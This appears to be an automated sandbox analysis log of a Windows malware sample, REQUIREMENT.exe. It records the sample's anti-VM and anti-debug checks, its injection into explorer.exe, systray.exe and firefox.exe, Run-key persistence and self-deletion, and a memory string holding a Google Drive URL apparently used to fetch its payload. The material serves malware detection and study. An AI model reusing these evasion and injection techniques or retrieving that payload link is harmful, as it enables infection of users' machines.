Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process created: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe'	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:304:WilStaging_02

Source: Yara match	File source: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.35598358285.00000000022C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.35818096692.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.35647851056.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.35540305146.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.35777303082.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00404C7B push eax; retf	1_2_00404C82
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00404619 push esp; retf	1_2_0040461A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00405035 push ss; retf	1_2_00405037
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00403ADA push ecx; retf	1_2_00403ADC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_0040528D push esp; retf	1_2_0040528E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_004044B5 push eax; retf	1_2_004044B6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00403B4B push ebp; retf	1_2_00403B4C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00405775 push eax; retf	1_2_00405779
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_00404F2B push edi; iretd	1_2_00404F3A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B3E65 pushad ; ret	1_2_023B3E68
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B209B push ecx; ret	1_2_023B209C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B40EC push eax; retn 0010h	1_2_023B412E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B26CA push FFFFFF81h; ret	1_2_023B26CC
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B42C3 push eax; ret	1_2_023B42D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B4125 push eax; retn 0010h	1_2_023B412E
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B4B54 push ecx; ret	1_2_023B4B5A
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B0792 push ds; ret	1_2_023B0794
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BA1C7 push eax; retf B6D8h	1_2_023BC7F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B13C7 push eax; retf	1_2_023B13C8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9697A1 push es; iretd	3_2_1E9697A8
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9908CD push ecx; mov dword ptr [esp], ecx	3_2_1E9908D6
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9621AD pushad ; retf 0004h	3_2_1E96223F
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_0056CA6D push eax; retf	3_2_0056CA6F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049908CD push ecx; mov dword ptr [esp], ecx	13_2_049908D6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E6033 push ecx; ret	13_2_027E6034
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E363A push eax; ret	13_2_027E363B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027EB7FB push eax; ret	13_2_027EB862
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027EB7F2 push eax; ret	13_2_027EB7F8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027EB7A5 push eax; ret	13_2_027EB7F8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027DD45C push edx; iretd	13_2_027DD45B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027DD451 push edx; iretd	13_2_027DD45B

Source: C:\Windows\SysWOW64\systray.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run S610FPS8_B7			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run S610FPS8_B7			Jump to behavior

Source: C:\Windows\SysWOW64\systray.exe	Process created: /c del 'C:\Users\user\Desktop\REQUIREMENT.exe'
Source: C:\Windows\SysWOW64\systray.exe	Process created: /c del 'C:\Users\user\Desktop\REQUIREMENT.exe'			Jump to behavior

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\REQUIREMENT.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	File opened: C:\Program Files\qga\qga.exe

Source: REQUIREMENT.exe, 00000001.00000002.32667639954.00000000023D0000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33046387587.0000000000780000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35412372159.0000000002280000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35540543044.00000000022C0000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35598456515.00000000022E0000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35648002404.0000000000740000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35777561069.00000000006F0000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820502952.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: REQUIREMENT.exe, 00000001.00000002.32667639954.00000000023D0000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35412372159.0000000002280000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35540543044.00000000022C0000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35598456515.00000000022E0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: REQUIREMENT.exe, 00000003.00000002.33046387587.0000000000780000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35648002404.0000000000740000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35777561069.00000000006F0000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820502952.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1CAVMVFHBKRKR58KPBP8YMMPJAEJZGE13

Source: C:\Windows\explorer.exe TID: 412	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 2976	Thread sleep count: 103 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 2976	Thread sleep time: -206000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe	Last function: Thread delayed

Source: certmgr3ff.exe, 0000001C.00000002.35819307372.000000000086F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWY:
Source: certmgr3ff.exe, 0000001B.00000002.35777835368.0000000000848000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWx
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWp
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp, explorer.exe, 00000009.00000000.33253954243.0000000010CE2000.00000004.00000001.sdmp, systray.exe, 0000000D.00000002.37530796662.0000000002ACD000.00000004.00000020.sdmp, certmgr3ff.exe, 0000001A.00000003.35641309479.00000000008A9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35778675696.00000000008E1000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35819307372.000000000086F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: certmgr3ff.exe, 0000001A.00000002.35648519943.0000000000844000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWh
Source: REQUIREMENT.exe, 00000001.00000002.32667639954.00000000023D0000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33046387587.0000000000780000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35412372159.0000000002280000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35540543044.00000000022C0000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35598456515.00000000022E0000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35648002404.0000000000740000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35777561069.00000000006F0000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820502952.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW^
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: certmgr3ff.exe, 0000001B.00000002.35778675696.00000000008E1000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW~h
Source: firefox.exe, 00000015.00000002.35251475705.000001E9274E0000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: REQUIREMENT.exe, 00000001.00000002.32667639954.00000000023D0000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35412372159.0000000002280000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35540543044.00000000022C0000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35598456515.00000000022E0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH
Source: REQUIREMENT.exe, 00000003.00000002.33046387587.0000000000780000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35648002404.0000000000740000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35777561069.00000000006F0000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820502952.00000000023F0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13
Source: certmgr3ff.exe, 0000001C.00000002.35818481696.00000000007D8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW(4
Source: explorer.exe, 00000009.00000000.32893898674.0000000010F10000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWen-USn
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: REQUIREMENT.exe, 00000001.00000002.32669120415.0000000004CA9000.00000004.00000001.sdmp, REQUIREMENT.exe, 00000003.00000002.33048668264.0000000002589000.00000004.00000001.sdmp, certmgr3ff.exe, 00000017.00000002.35414721932.0000000004CD9000.00000004.00000001.sdmp, certmgr3ff.exe, 00000018.00000002.35542482603.0000000004C29000.00000004.00000001.sdmp, certmgr3ff.exe, 00000019.00000002.35600487795.0000000004C19000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35650663186.00000000025B9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35779612606.0000000002509000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: certmgr3ff.exe, 0000001C.00000002.35820835523.0000000002539000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BBBCC RtlAddVectoredExceptionHandler,		1_2_023BBBCC
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CBBCC RtlAddVectoredExceptionHandler,		25_2_022CBBCC

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Thread register set: target process: 680			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Thread register set: target process: 680			Jump to behavior

Source: explorer.exe, 00000009.00000000.32964367493.0000000004F80000.00000004.00000001.sdmp, systray.exe, 0000000D.00000002.37531739611.0000000003150000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
